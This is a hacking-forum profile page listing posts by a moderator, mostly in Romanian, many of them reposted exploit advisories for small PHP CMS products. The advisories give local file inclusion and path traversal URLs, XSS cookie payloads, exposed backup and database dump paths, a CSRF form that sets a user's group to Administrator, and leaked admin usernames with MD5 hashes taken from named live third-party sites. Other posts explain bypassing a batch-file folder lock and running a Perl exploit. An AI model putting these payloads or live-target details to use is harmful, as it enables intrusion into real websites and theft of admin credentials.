Jump to content

SirGod

Moderators
  • Posts

    784
  • Joined

  • Last visited

  • Days Won

    27

Everything posted by SirGod

  1. Si io vreau un "hack" care sami dea numerele la loto.
  2. am incercat si io sa gasesc video.la attachaments nu e nimic.cred ca maine ii dau un mail la autor.
  3. hy pierd teren?ai uitat ca hy a fost root@unkn0wn cu putin timp in urma(autori DaSteem si Rose)?"ce au facut" ei acuma e un mare nimic.
  4. Author : Gammarays Contents : Part I - Introduction Part II - A quick overview Part III - The structure of the authentication cookies and their role Part IV - The user database Part V - Scope Part VI - Recommendations Appendix A - Rant Appendix B – Greetings Video - (proof.avi) Demonstration of logging into any Yahoo! account. Here : http://milw0rm.com/papers/270
  5. I know,useless. Cum sa treci de "folder lock" (ala cu .bat) 1.Intri in Opera deoarece Opera arata toate fisierele de sistem.Mozilla nu. 2.Te duci pana unde ai folderul . Ex (daca ai folderu pe desktop) : file://localhost/c:/Documents and Settings/Admin/Desktop/ . 3.Folderul tau va fi ceva de genul. Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D} . 4.Intri in el,accesezi fisere fara nici o parola. Toata faza e ca "programul" ala nu pune parola pe folder ci nu il afiseaza pana nu introduci parola(accesat in mod normal,prin fisierul ala).
  6. Si chiar nu te-ai prins ca nu suntem noi?Vezi vreun admin din MT pe acolo?Nu vezi ca forumu arata ca o p**a?Daca eram noi am fi pus backupul nu am fi luat-o de la 0. Si site-ul nu are nici o legatura cu noi.
  7. am uitat sa zic..sa nu uitati in privatul lor,XSSurile gasite in siteuri foarte mari )
  8. This Account Has Been Suspended. Please contact the billing/support department as soon as possible. Imi pare asa de rau pentru hostul vostru...
  9. Nu e o luna,prima e de aproape o luna.
  10. Pentru ca pula lu Kenpachi nu vrea sa fie postat pe rst ... nu se accepta, posteaza la voi pe site ... aaa ... nu aveti ... naspa.
  11. ######################################################################################### [+] Thickbox Gallery v2 Admin Data Disclosure [+] Discovered By SirGod [+] MorTal TeaM [+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz ########################################################################################## [+] Arbitrary Admin Data Disclosure - Go here and you will see the admin data ( login name + crypted password as MD5 ) [url]http://localhost/[/url][Path]/conf/admins.php - Admin data : a:1:{s:5:"admin";s:32:"d73ed8a01f624fcb878296bc7ff302bc";} - Now extract the admin username and the hash : Username : admin Password : d73ed8a01f624fcb878296bc7ff302bc [+] Live Demo [url]http://www.davilin.com/tbg/conf/admins.php[/url] - Retrived : a:1:{s:8:"ytakenak";s:32:"56bd1d32bcb1fbd2609e4d7634febbd1";} - Name + Password Username : ytakenak Password : 56bd1d32bcb1fbd2609e4d7634febbd1 ########################################################################################## # milw0rm.com [2008-08-26]
  12. ################################################################################################################## [+] CMME 1.12 (LFI/XSS/CSRF/Download Backup/MkDir) Multiple Remote Vulnerabilities [+] Discovered By SirGod [+] MorTal TeaM [+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz ################################################################################################################## [+] Local File Inclusion Note : magic_quotes_gpc must be off. Example : [url]http://localhost/index.php?page=weblog&env=[/url][Local File]%00 PoC : [url]http://localhost/index.php?page=weblog&env=../../../autoexec.bat%00[/url] [+] Download Backup Example 1: [url]http://localhost/backup/[/url][Backup Name].zip PoC 1: [url]http://localhost/backup/cmme_data.zip[/url] Live Demo 1: [url]http://cmme.oesterholt.net/backup/cmme_data.zip[/url] Example 2: [url]http://localhost/backup/[/url][Backup Name].zip PoC 2: [url]http://localhost/backup/cmme_cmme.zip[/url] Live Demo 2: [url]http://cmme.oesterholt.net/backup/cmme_cmme.zip[/url] [+] Make Directory You can make multiple directories in website root folder. Example 1: [url]http://localhost/admin.php?action=login&page=home&script=index.php&env=[/url][Directory] PoC 1: http://localhost/admin.php?action=login&page=home&script=index.php&env=!!!Owned!!! Or you can make dir in previous directory,etc. Example 2: [url]http://localhost/admin.php?action=login&page=home&script=index.php&env=../[/url][Directory] PoC 2: http://localhost/admin.php?action=login&page=home&script=index.php&env=../!!!Owned!!! [+] Cross Site Scripting Example 1: [url]http://localhost/statistics.php?action=hstat_year&page=[/url][XSS}&env=data PoC 1: http://localhost/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data Live Demo 1: http://cmme.oesterholt.net/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data Example 2: [url]http://localhost/statistics.php?action=hstat_year&year=[/url][XSS]&env=data PoC 2: http://localhost/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data Live Demo 2: http://cmme.oesterholt.net/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data [+] Cross Site Request Forgery If an logged in user with administrator privileges clicks the following link he will be logged out. [url]http://localhost/admin.php?action=logout&page=home&env=data[/url] ################################################################################################################## # milw0rm.com [2008-08-26]
  13. ################################################################################ [+] NoName Script 1.1 BETA Multiple Remote Vulnerabilities [+] Discovered By SirGod [+] MorTal TeaM [+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz ################################################################################# [+] Local File Inclusion [url]http://localhost/index.php?action=../../../autoexec.bat%00&kategorie=Tutorial[/url] This will open autoexec.bat . [+] SQL Injection [url]http://localhost/index.php?action=newsadmindel&file_id=[/url][SQL] [+] Cross Site Request Forgery If an logged in user with administrative permisions will click the following link ,he will be logged out. [url]http://localhost/logout.php[/url] [+] Cross Site Request Forgery - Change User Profile If an logged in user with administrative permisions will click the following link the following action will be executed. What to change : - form action and profil_id : <form action="http://localhost/index.php?action=editsettings&profil_id=67" method="post" ....etc > action : change [url]http://localhost[/url] with the website link. profil_id : id of the user that you want to change settings for it - input value : <td><input name="edit_benutzername" disabled="disabled" value="Sirgod" type="text"></td> value : your name (corresponding to ID) And now edit the other settings change via web browser.After that,use this CSRF wisely. [+] Here is the HTML code : <form action="http://localhost/index.php?action=editsettings&profil_id=67" method="post" name="editsettings" id="editsettings"> <input name="sent" value="1" type="hidden"> <center><table border="0" cellpadding="3" cellspacing="0"> <tbody><tr> <td colspan="2" style="font-weight: bold;"> Benutzerinformationen </td> </tr> <tr> <td>Benutzername:</td> <td><input name="edit_benutzername" disabled="disabled" value="Sirgod" type="text"></td> </tr> <tr> <td>Benutzergruppe:</td> <td> <select name="edit_benutzergruppe" size="1"> <option value="0">User</option> <option value="1">Premium Member</option> <option value="2">Deleter</option> <option value="3">Moderator</option> <option value="4" selected="selected">Administrator</option> </select> </td> </tr> <tr> <td colspan="2"><hr></td> </tr> <tr> <td colspan="2" style="font-weight: bold;"> Zusätzliche Informationen </td> </tr> <tr> <td>Geschlecht:</td> <td> <select name="edit_geschlecht" size="1"> <option value="">keine Angabe</option> <option value="m" selected="selected">männlich</option> <option value="w">weiblich</option> </select> </td> </tr> <tr> <td>Geburtstag:</td> <td> <select name="edit_gb_tag" size="1"> <option value=""></option> <option value="1">1</option><option value="2">2</option><option value="3" selected="selected">3</option><option value="4">4</option><option value="5">5</option><option value="6">6</option><option value="7">7</option><option value="8">8</option><option value="9">9</option><option value="10">10</option><option value="11">11</option><option value="12">12</option><option value="13">13</option><option value="14">14</option><option value="15">15</option><option value="16">16</option><option value="17">17</option><option value="18">18</option><option value="19">19</option><option value="20">20</option><option value="21">21</option><option value="22">22</option><option value="23">23</option><option value="24">24</option><option value="25">25</option><option value="26">26</option><option value="27">27</option><option value="28">28</option><option value="29">29</option><option value="30">30</option><option value="31">31</option> </select> <select name="edit_gb_monat" size="1"> <option value=""></option> <option value="1">Januar</option><option value="2">Februar</option><option value="3">März</option><option value="4">April</option><option value="5">Mai</option><option value="6">Juni</option><option value="7">Juli</option><option value="8">August</option><option value="9">September</option><option value="10">Oktober</option><option value="11" selected="selected">November</option><option value="12">Dezember</option> </select> <input name="edit_gb_jahr" style="width: 45px;" maxlength="4" value="1991" type="text"> </td> </tr> <tr> <td valign="top">Benutzertext:</td> <td><textarea name="edit_beschreibung" style="width: 270px; height: 90px;">Was geht aaaab xD</textarea> </td></tr> <tr> <td>Homepage:</td> <td><input name="edit_homepage" value="http://paddys.tk" type="text"></td> </tr> <tr> <td colspan="2"><hr></td> </tr> <tr> <td colspan="2" style="font-weight: bold;"> Instant Messaging </td> </tr> <tr> <td>ICQ-Nummer:</td> <td><input name="edit_icq" value="" type="text"></td> </tr> <tr> <td>MSN-Name:</td> <td><input name="edit_msn" value="" type="text"></td> </tr> <tr> <td>AIM-Name:</td> <td><input name="edit_yahoo" value="" type="text"></td> </tr> <tr> <td colspan="2"><hr></td> </tr> <tr> <td colspan="2" style="font-weight: bold;"> Verwarnungen </td> </tr> <tr> <td></td> <td> Admin wurde noch nicht verwarnt. </td> </tr> <tr> <td>Aktion:</td> <td> [url="#"]Verwarnungen verwalten[/url] </td> </tr> <tr> <td colspan="2"></td> </tr> <tr> <td></td> <td><input name="submit" value="Speichern" type="submit"></td> </tr> </tbody></table></center> </form> ################################################################################# # milw0rm.com [2008-08-23]
  14. ####################################################################### [+] NoName Script 1.0 Local File Inclusion [+] Discovered By SirGod [+] MorTal TeaM [+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz ######################################################################## Example : [url]http://localhost/index.php?action=../../../autoexec.bat%00[/url] This will open autoexec.bat . ######################################################################## # milw0rm.com [2008-08-22]
  15. autoexec.bat e pe Vista.Eu am vista,si le testez pe localhost.Nu stiu daca e si pe XP.
  16. #################################################################### [+] EasySite v2.3 Multiple Remote Vulnerabilities [+] Discovered By SirGod [+] MorTal TeaM [+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN #################################################################### [+] Local File Inclusion [url]http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00[/url] [url]http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00[/url] [url]http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00[/url] [url]http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00[/url] [url]http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00[/url] [url]http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00[/url] [url]http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00[/url] And many others... This will open autoexec.bat [+] Arbitrary View Folder Contents You can view the folder contents and the content of files view via LFI. [url]http://localhost/www/index.php?module=../../../[/url] [url]http://localhost/inc/vmenu.php?module=../../../[/url] This will open C:/ directory and will show all the files from C:/ . Example : * BOOTSECT.BAK * BcBtRmv.log * IO.SYS * MSDOS.SYS * autoexec.bat * bootmgr * config.sys * grldr * hiberfil.sys * pagefile.sys #################################################################### # milw0rm.com [2008-08-21]
  17. ########################################################################### [+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF [+] Discovered By SirGod [+] MorTal TeaM [+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN ########################################################################### [+] Arbitrary Download Database Go to [url]http://localhost/[/url][Path]/adminpanel/phpmydump.php and the download will begin ( database.sql ) . [+] Cross Site Scripting [url]http://localhost/[/url][Path]/merchandise.php?type=[XSS] [url]http://localhost/[/url][Path]/merchandise.php?type=<script>alert(document.cookie)</script> [+] Cross Site Request Forgery If a logged in user with administrator privilegies click the following url he will be logged out. [url]http://localhost/[/url][Path]/adminpanel/logout.php ########################################################################### # milw0rm.com [2008-08-21]
  18. ###################################### [+] syzygyCMS 0.3 Local File Inclusion [+] Discovered By SirGod [+] MorTal TeaM [+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin [+] also ToxicBlood,MesSiAH,xZu ###################################### Example : [url]http://localhost/x/index.php?page=../../../autoexec.bat[/url] This will open autoexec.bat . ########################################### # milw0rm.com [2008-08-03] x=PATH . http://milw0rm.com/exploits/6200
  19. Google results : XSS http://www.google.ro/search?hl=ro&q=vbulletin+3.6.10+xss&btnG=C%C4%83utare+Google&meta= Se pare ca tie iti e lene sa cauti.
  20. Un site ca asta?Nu cred,cele doua site-uri sunt diferite.
  21. Scuze,am gresit nu m-am uitat la exploit sa vad <?php m-am uitat la ala al tau cu exploit.pl
  22. In primul rand nu e exploit de PHPBB 3 . E de Woltlab Burning Board 2.X. Il salvezi ca exploit.pl ,il muti in c:/perl/ intri in CMD si scri: cd\ cd perl perl exploit.pl
×
×
  • Create New...